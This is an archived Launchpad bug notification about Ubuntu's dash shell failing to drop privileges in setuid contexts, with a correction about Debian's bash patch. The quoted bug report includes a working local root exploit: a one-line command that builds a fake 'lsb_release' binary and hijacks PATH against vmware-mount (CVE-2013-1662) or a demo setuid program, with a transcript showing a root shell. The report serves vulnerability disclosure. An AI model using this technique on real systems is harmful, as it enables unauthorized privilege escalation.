touch-packages team mailing list archive
-
touch-packages team
-
Mailing list archive
-
Message #80729
[Bug 1215660] Re: dash does not drop privileges when euid != uid, this can cause local root exploits when setuid programs use system() or popen()
correction on my previous comment:
My point "1" is only true on Debian and derivatives. bash does drop its
privilege when setuid and called as sh without -p just like when not
called as sh, but Debian's bash package has a patch that disables that
dropping of privileges when called as sh.
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586
** Bug watch added: Debian Bug tracker #52586
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dash in Ubuntu.
https://bugs.launchpad.net/bugs/1215660
Title:
dash does not drop privileges when euid != uid, this can cause local
root exploits when setuid programs use system() or popen()
Status in dash package in Ubuntu:
Triaged
Bug description:
Poorly written setuid programs may call 'popen' or 'system' with
incorrectly specified arguments. For instance, there is a bug in
vmware-mount where it calls "popen('lsb-release')" (CVE-2013-1662). It
should be "popen('/usr/bin/lsb-release')". Because of this, an
attacker can drop a file named 'lsb-release' in . and then call
vmware-mount, and it will happily popen the attacker controlled file
as root.
Now, bash has a 'privdrop' option, however debian removed this option in the 1990's:
http://patch-tracker.debian.org/patch/series/view/bash/4.2+dfsg-0.1/privmode.diff and
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586
Most shells will drop privs when euid != uid, because it turns out
calling popen / system from setuid scripts is nearly impossible to get
right (in fact, pretty much any setuid script is insanely difficult to
write without a vulnerability in it.
Ensure /bin/sh is dash
antarus@goats5 ~ $ sudo ln -sf /bin/dash /bin/sh
antarus@goats5 ~ $ cc -xc - -olsb_release<<<'main(){system("sh>`tty` 2>&1");}';PATH=.:$PATH vmware-mount
# whoami
root
If we switched to a sane shell (like busybox for example.)
antarus@goats5 ~ $ sudo ln -sf /bin/busybox /bin/sh
antarus@goats5 ~ $ cc -xc - -olsb_release<<<'main(){system("/bin/sh>`tty` 2>&1");}';PATH=.:$PATH vmware-mount
BusyBox v1.18.5 (Ubuntu 1:1.18.5-1ubuntu4.1) built-in shell (ash)
Enter 'help' for a list of built-in commands.
/usr/local/google/home/antarus $ whoami
whoami: unknown uid XXXXX # I have omitted my actual UID, needless to say it isn't uid 0 :)
Now you may be saying 'hey i don't have vmware-mount handy' so
instead:
antarus@goats5 ~ $ cat /tmp/silly_setuid.c
#include <stdio.h>
int main(int argc, char ** argv) {
popen("lsb_release", "r");
}
antarus@goats5 ~ $ gcc /tmp/silly_setuid.c -o silly_setuid
antarus@goats5 ~ $ sudo chown root:root silly_setuid
[sudo] password for antarus:
antarus@goats5 ~ $ sudo chmod 4755 silly_setuid
antarus@goats5 ~ $ cc -xc - -olsb_release<<<'main(){system("whoami>`tty` 2>&1");}';PATH=.:$PATH silly_setuid
antarus@goats5 ~ $ root
Distributor ID: Ubuntu
Description: Ubuntu 12.04.1 LTS
Release: 12.04
Codename: precise
antarus@goats5 ~ $ apt-cache policy dash
dash:
Installed: 0.5.7-2ubuntu2
Candidate: 0.5.7-2ubuntu2
Version table:
*** 0.5.7-2ubuntu2 0
600 my-apt-mirror ubuntu-precise/main amd64 Packages
100 /var/lib/dpkg/status
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dash/+bug/1215660/+subscriptions
